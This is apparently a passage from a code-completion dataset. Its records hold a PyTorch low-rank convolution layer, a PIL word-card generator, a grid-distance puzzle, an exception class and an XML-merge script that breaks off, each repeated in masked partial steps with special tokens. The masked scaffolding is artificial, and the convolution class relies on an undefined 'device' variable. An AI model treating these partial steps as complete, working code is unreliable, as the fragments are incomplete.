self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(
self.row_weights, self.conv_weights.reshape(self.filters //
self.times, -1))).reshape(self.filters - self.filters // self.
times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), bias=self.bias, padding=self.
padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), padding=self.padding, stride=
self.stride)
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
total_mul_1 = m.filters // m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +
total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
<|reserved_special_token_1|>
import torch
import torch.nn as nn
import torch.nn.functional as F
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(
self.row_weights, self.conv_weights.reshape(self.filters //
self.times, -1))).reshape(self.filters - self.filters // self.
times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), bias=self.bias, padding=self.
padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), padding=self.padding, stride=
self.stride)
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
total_mul_1 = m.filters // m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +
total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
<|reserved_special_token_1|>
import torch
import torch.nn as nn
import torch.nn.functional as F
# Const. low-rank version
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1, groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels//groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters//self.times, channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters-filters//self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters//self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(self.row_weights,self.conv_weights.reshape(self.filters//self.times,-1)))\
.reshape(self.filters-self.filters//self.times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\
bias=self.bias, padding=self.padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\
padding=self.padding, stride=self.stride)
#count FLOPs
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
# ops per output element
# kernel_mul = kh * kw * cin
# kernel_add = kh * kw * cin - 1
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
# total ops
# num_out_elements = y.numel()
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
# per output element
total_mul_1 = m.filters//m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw) # (m.filters - m.filters//m.times)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters//m.times) * (cin * kh * kw) # (m.filters - m.filters//m.times)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 + total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
|
flexible
|
{
"blob_id": "f714c7006f50379cc7508a13d710d902d38d2d1f",
"index": 425,
"step-1": "<mask token>\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n self.correlated_weights = torch.mm(self.column_weights, torch.mm(\n self.row_weights, self.conv_weights.reshape(self.filters //\n self.times, -1))).reshape(self.filters - self.filters // self.\n times, self.channels, self.kernel_size, self.kernel_size)\n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), bias=self.bias, padding=self.\n padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), padding=self.padding, stride=\n self.stride)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n self.correlated_weights = torch.mm(self.column_weights, torch.mm(\n self.row_weights, self.conv_weights.reshape(self.filters //\n self.times, -1))).reshape(self.filters - self.filters // self.\n times, self.channels, self.kernel_size, self.kernel_size)\n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), bias=self.bias, padding=self.\n padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), padding=self.padding, stride=\n self.stride)\n\n\ndef count_op_xCNNlow(m, x, y):\n x = x[0]\n multiply_adds = 1\n cin = m.channels\n cout = m.filters\n kh, kw = m.kernel_size, m.kernel_size\n batch_size = x.size()[0]\n out_h = y.size(2)\n out_w = y.size(3)\n kernel_ops = multiply_adds * kh * kw\n bias_ops = 1 if m.biasTrue is True else 0\n ops_per_element = kernel_ops + bias_ops\n output_elements = batch_size * out_w * out_h * cout\n conv_ops = output_elements * ops_per_element * cin // m.groups\n total_mul_1 = m.filters // m.times\n total_add_1 = total_mul_1 - 1\n num_elements_1 = m.rank * (cin * kh * kw)\n total_mul_2 = m.rank\n total_add_2 = total_mul_2 - 1\n num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)\n lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +\n total_add_2) * num_elements_2\n total_ops = lin_ops + conv_ops\n print(lin_ops, conv_ops)\n m.total_ops = torch.Tensor([int(total_ops)])\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n self.correlated_weights = torch.mm(self.column_weights, torch.mm(\n self.row_weights, self.conv_weights.reshape(self.filters //\n self.times, -1))).reshape(self.filters - self.filters // self.\n times, self.channels, self.kernel_size, self.kernel_size)\n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), bias=self.bias, padding=self.\n padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), padding=self.padding, stride=\n self.stride)\n\n\ndef count_op_xCNNlow(m, x, y):\n x = x[0]\n multiply_adds = 1\n cin = m.channels\n cout = m.filters\n kh, kw = m.kernel_size, m.kernel_size\n batch_size = x.size()[0]\n out_h = y.size(2)\n out_w = y.size(3)\n kernel_ops = multiply_adds * kh * kw\n bias_ops = 1 if m.biasTrue is True else 0\n ops_per_element = kernel_ops + bias_ops\n output_elements = batch_size * out_w * out_h * cout\n conv_ops = output_elements * ops_per_element * cin // m.groups\n total_mul_1 = m.filters // m.times\n total_add_1 = total_mul_1 - 1\n num_elements_1 = m.rank * (cin * kh * kw)\n total_mul_2 = m.rank\n total_add_2 = total_mul_2 - 1\n num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)\n lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +\n total_add_2) * num_elements_2\n total_ops = lin_ops + conv_ops\n print(lin_ops, conv_ops)\n m.total_ops = torch.Tensor([int(total_ops)])\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# Const. low-rank version\nclass xCNNlow(torch.nn.Module):\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1, groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels//groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n\n self.conv_weights = nn.Parameter(torch.Tensor(filters//self.times, channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters-filters//self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters//self.times).to(device))\n \n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n \n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input): \n self.correlated_weights = torch.mm(self.column_weights, torch.mm(self.row_weights,self.conv_weights.reshape(self.filters//self.times,-1)))\\\n .reshape(self.filters-self.filters//self.times, self.channels, self.kernel_size, self.kernel_size) \n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\\\n bias=self.bias, padding=self.padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\\\n padding=self.padding, stride=self.stride)\n\n\n#count FLOPs\ndef count_op_xCNNlow(m, x, y):\n x = x[0]\n\n multiply_adds = 1\n\n cin = m.channels\n cout = m.filters\n kh, kw = m.kernel_size, m.kernel_size\n batch_size = x.size()[0]\n\n out_h = y.size(2)\n out_w = y.size(3)\n\n # ops per output element\n # kernel_mul = kh * kw * cin\n # kernel_add = kh * kw * cin - 1\n kernel_ops = multiply_adds * kh * kw\n bias_ops = 1 if m.biasTrue is True else 0\n ops_per_element = kernel_ops + bias_ops\n\n # total ops\n # num_out_elements = y.numel()\n output_elements = batch_size * out_w * out_h * cout\n conv_ops = output_elements * ops_per_element * cin // m.groups\n\n # per output element\n total_mul_1 = m.filters//m.times\n total_add_1 = total_mul_1 - 1\n num_elements_1 = m.rank * (cin * kh * kw) # (m.filters - m.filters//m.times)\n total_mul_2 = m.rank\n total_add_2 = total_mul_2 - 1\n num_elements_2 = (m.filters - m.filters//m.times) * (cin * kh * kw) # (m.filters - m.filters//m.times)\n lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 + total_add_2) * num_elements_2\n total_ops = lin_ops + conv_ops\n print(lin_ops, conv_ops)\n\n m.total_ops = torch.Tensor([int(total_ops)])\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
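A minimal smoke test makes the low-rank construction above concrete. The module expects a global named device, which the sketch supplies on CPU; all shapes and values are illustrative, and the comparison against a dense nn.Conv2d only shows that the low-rank variant stores fewer parameters.

# Minimal smoke test for xCNNlow (illustrative; not part of the original blob).
import torch
import torch.nn as nn

device = torch.device('cpu')  # the class above reads a module-level `device`; define it in the same module

layer = xCNNlow(channels=16, filters=32, kernel_size=3, padding=1, rank=1)
out = layer(torch.randn(1, 16, 8, 8))
print(out.shape)  # expected: torch.Size([1, 32, 8, 8])

dense_params = sum(p.numel() for p in nn.Conv2d(16, 32, 3, padding=1).parameters())
lowrank_params = sum(p.numel() for p in layer.parameters())
print(dense_params, lowrank_params)  # the low-rank layer keeps only half the kernels plus two small factors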
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_card(word, image_path, filepath='data/cards/', filename=None):
"""Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
"""
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(content=content, image=image, auth_font=fonts.
aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font
=fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.
word_font, thumb_font=fonts.thumb_font)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_card(word, image_path, filepath='data/cards/', filename=None):
"""Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
"""
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(content=content, image=image, auth_font=fonts.
aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font
=fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.
word_font, thumb_font=fonts.thumb_font)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
if __name__ == '__main__':
from random import randint
save_card(get_random_word(),
f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')
<|reserved_special_token_1|>
from PIL import Image
from src import urbandictionary_api
from src.card.cardDrawer import CardDrawer
from src.card.cardModel import CardModel
from src.repository import Repository
from src.urbandictionary_api import get_random_word
def save_card(word, image_path, filepath='data/cards/', filename=None):
"""Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
"""
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(content=content, image=image, auth_font=fonts.
aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font
=fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.
word_font, thumb_font=fonts.thumb_font)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
if __name__ == '__main__':
from random import randint
save_card(get_random_word(),
f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')
<|reserved_special_token_1|>
from PIL import Image
from src import urbandictionary_api
from src.card.cardDrawer import CardDrawer
from src.card.cardModel import CardModel
from src.repository import Repository
from src.urbandictionary_api import get_random_word
def save_card(word, image_path, filepath='data/cards/', filename=None):
    '''Function that generates and saves the card image
    Returns filepath+filename

    Parameters:
    word - the word whose content will appear on the card
    image - the background image
    filepath - the path where the image is stored
    filename - the image file name
    '''
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(
content=content,
image=image,
auth_font=fonts.aut_font,
cat_font=fonts.cat_font,
def_font=fonts.def_font,
ex_font=fonts.ex_font,
rect_font=fonts.rect_font,
word_font=fonts.word_font,
thumb_font=fonts.thumb_font
)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
if __name__ == '__main__':
from random import randint
save_card(get_random_word(), f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')
|
flexible
|
{
"blob_id": "6bf1d410a33e3b2535e39e4f8c5c7f8278b3de67",
"index": 330,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n \"\"\"Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n \"\"\"\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(content=content, image=image, auth_font=fonts.\n aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font\n =fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.\n word_font, thumb_font=fonts.thumb_font)\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n return path\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n \"\"\"Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n \"\"\"\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(content=content, image=image, auth_font=fonts.\n aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font\n =fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.\n word_font, thumb_font=fonts.thumb_font)\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n return path\n\n\nif __name__ == '__main__':\n from random import randint\n save_card(get_random_word(),\n f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')\n",
"step-4": "from PIL import Image\nfrom src import urbandictionary_api\nfrom src.card.cardDrawer import CardDrawer\nfrom src.card.cardModel import CardModel\nfrom src.repository import Repository\nfrom src.urbandictionary_api import get_random_word\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n \"\"\"Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n \"\"\"\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(content=content, image=image, auth_font=fonts.\n aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font\n =fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.\n word_font, thumb_font=fonts.thumb_font)\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n return path\n\n\nif __name__ == '__main__':\n from random import randint\n save_card(get_random_word(),\n f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')\n",
"step-5": "from PIL import Image\n\nfrom src import urbandictionary_api\nfrom src.card.cardDrawer import CardDrawer\nfrom src.card.cardModel import CardModel\nfrom src.repository import Repository\nfrom src.urbandictionary_api import get_random_word\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n '''Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n '''\n\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(\n content=content,\n image=image,\n auth_font=fonts.aut_font,\n cat_font=fonts.cat_font,\n def_font=fonts.def_font,\n ex_font=fonts.ex_font,\n rect_font=fonts.rect_font,\n word_font=fonts.word_font,\n thumb_font=fonts.thumb_font\n )\n\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n\n return path\n\n\nif __name__ == '__main__':\n from random import randint\n\n save_card(get_random_word(), f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
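The __main__ block in the record above already shows a single invocation; a batched variant built only from the same two calls might look like the sketch below. The loop count and background paths are illustrative.

# Illustrative batch run over random words, reusing only calls shown in the blob above.
from random import randint

for _ in range(5):
    word = get_random_word()
    background = f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg'
    print(save_card(word, background))  # prints the path of the saved card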
n = int(input())
m = int(input())
x = int(input())
y = int(input())
if m < n:
if m - x < x:
x = m - x
if n - y < y:
y = n - y
else:
if n - x < x:
x = n - x
if m - y < y:
y = m - y
if x < y:
print(x)
else:
print(y)
|
normal
|
{
"blob_id": "002cced6d24a4790d29f195355c795d609f744a7",
"index": 9134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif m < n:\n if m - x < x:\n x = m - x\n if n - y < y:\n y = n - y\nelse:\n if n - x < x:\n x = n - x\n if m - y < y:\n y = m - y\nif x < y:\n print(x)\nelse:\n print(y)\n",
"step-3": "n = int(input())\nm = int(input())\nx = int(input())\ny = int(input())\nif m < n:\n if m - x < x:\n x = m - x\n if n - y < y:\n y = n - y\nelse:\n if n - x < x:\n x = n - x\n if m - y < y:\n y = m - y\nif x < y:\n print(x)\nelse:\n print(y)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
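The branching in the record above is easier to check when wrapped in a function; the wrapper below is a mechanical restatement of the same logic, and the sample values are arbitrary, chosen only so the printed result can be compared against a manual trace.

# Function-wrapped restatement of the same branching, handy for quick checks (illustrative).
def min_to_border(n, m, x, y):
    if m < n:
        x = min(x, m - x)
        y = min(y, n - y)
    else:
        x = min(x, n - x)
        y = min(y, m - y)
    return min(x, y)

print(min_to_border(5, 10, 3, 2))  # 2, matching a manual trace of the snippet above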
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WebCommandException(SoftException):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
<|reserved_special_token_1|>
from soft_exception import SoftException
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
<|reserved_special_token_1|>
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/web_client_api/__init__.py
from soft_exception import SoftException
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
|
flexible
|
{
"blob_id": "0f4864b745768994ea55a931e4d8b0681c058465",
"index": 2828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass WebCommandException(SoftException):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-4": "from soft_exception import SoftException\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-5": "# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/web_client_api/__init__.py\nfrom soft_exception import SoftException\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
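Since the class in the record above only forwards its description to SoftException, a usage sketch is short; the message text is illustrative.

# Illustrative only: the exception carries a plain description string.
try:
    raise WebCommandException('unknown web command')
except SoftException as exc:
    print(exc)  # unknown web command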
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for root in rootsToAdd:
for elem in root:
root1.append(elem)
rutas0k_10k.write('rutas/rutas0k-110k.xml')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
rutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')
rutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')
rutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')
rutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')
rutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')
rutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')
root1 = rutas0k_10k.getroot()
root2 = rutas10k_30k.getroot()
root3 = rutas30k_50k.getroot()
root4 = rutas50k_70k.getroot()
root5 = rutas70k_90k.getroot()
